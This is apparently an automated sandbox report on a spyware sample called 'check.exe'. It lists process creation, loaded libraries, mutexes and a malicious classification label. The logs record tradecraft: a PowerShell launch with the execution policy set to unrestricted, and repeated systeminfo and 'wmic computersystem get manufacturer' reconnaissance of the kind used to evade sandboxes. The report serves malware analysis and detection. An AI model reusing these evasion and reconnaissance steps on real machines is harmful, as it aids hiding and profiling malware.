Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD69A40	16_2_00007FFB9DD69A40
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD64E30	16_2_00007FFB9DD64E30
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD62B00	16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD68FA0	16_2_00007FFB9DD68FA0

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: String function: 00007FF61E8E2710 appears 52 times
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: String function: 00007FFB9DD61D70 appears 39 times
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: String function: 00007FFB9DD61070 appears 43 times

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3120 -s 968

Source: unicodedata.pyd.4.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: python3.dll.6.dr	Static PE information: No import functions for PE file found
Source: python3.dll.4.dr	Static PE information: No import functions for PE file found

Source: Qt5Core.dll.4.dr	Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: Qt5Core.dll.6.dr	Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317

Source: classification engine

Classification label: mal68.spyw.evad.winPS1@39/433@1/1

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD67E20 GetCurrentProcess,OpenProcessToken,GetLastError,ImpersonateSelf,OpenProcessToken,GetLastError,PyErr_SetFromWindowsErrWithFilename,LookupPrivilegeValueA,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,RevertToSelf,CloseHandle,

16_2_00007FFB9DD67E20

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD62A30 PyArg_ParseTuple,PyUnicode_AsWideCharString,PyEval_SaveThread,GetDiskFreeSpaceExW,PyEval_RestoreThread,PyMem_Free,PyExc_OSError,PyErr_SetExcFromWindowsErrWithFilenameObject,Py_BuildValue,

16_2_00007FFB9DD62A30

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD66069 PyDict_New,memset,CreateToolhelp32Snapshot,PyErr_SetFromWindowsErr,_Py_Dealloc,Process32First,PyLong_FromLong,PyLong_FromLong,PyDict_SetItem,_Py_Dealloc,_Py_Dealloc,Process32Next,CloseHandle,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseHandle,

16_2_00007FFB9DD66069

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD68B10 PyArg_ParseTuple,StartServiceA,CloseServiceHandle,CloseServiceHandle,_Py_NoneStruct,_Py_NoneStruct,

16_2_00007FFB9DD68B10

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\nozEdZJe.zip

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4360:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3120
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5536

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxska3ev.3nn.ps1

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: check.exe	String found in binary or memory: <!--StartFragment-->
Source: check.exe	String found in binary or memory: <!--StartFragment-->

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: unknown	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3120 -s 968
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 968
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5536 -s 1012
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: msvcp140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: wldp.dll
